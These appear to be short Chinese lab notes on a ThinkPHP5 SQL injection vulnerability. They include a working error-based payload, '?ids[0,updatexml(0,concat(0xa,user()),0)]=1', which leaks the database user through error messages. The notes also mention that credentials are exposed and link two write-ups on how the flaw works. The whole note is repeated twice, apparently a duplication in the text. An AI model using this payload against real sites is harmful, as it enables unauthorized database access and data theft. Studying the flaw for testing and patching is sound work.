打开这样的
爆出用户名密码
?ids[]=1&ids[]=2
错误回显敏感信息,数据库名
?ids[0,updatexml(0,concat(0xa,user()),0)]=1
漏洞原理
https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
https://www.secpulse.com/archives/59120.html
打开这样的
爆出用户名密码
?ids[]=1&ids[]=2
错误回显敏感信息,数据库名
?ids[0,updatexml(0,concat(0xa,user()),0)]=1
漏洞原理
https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
https://www.secpulse.com/archives/59120.html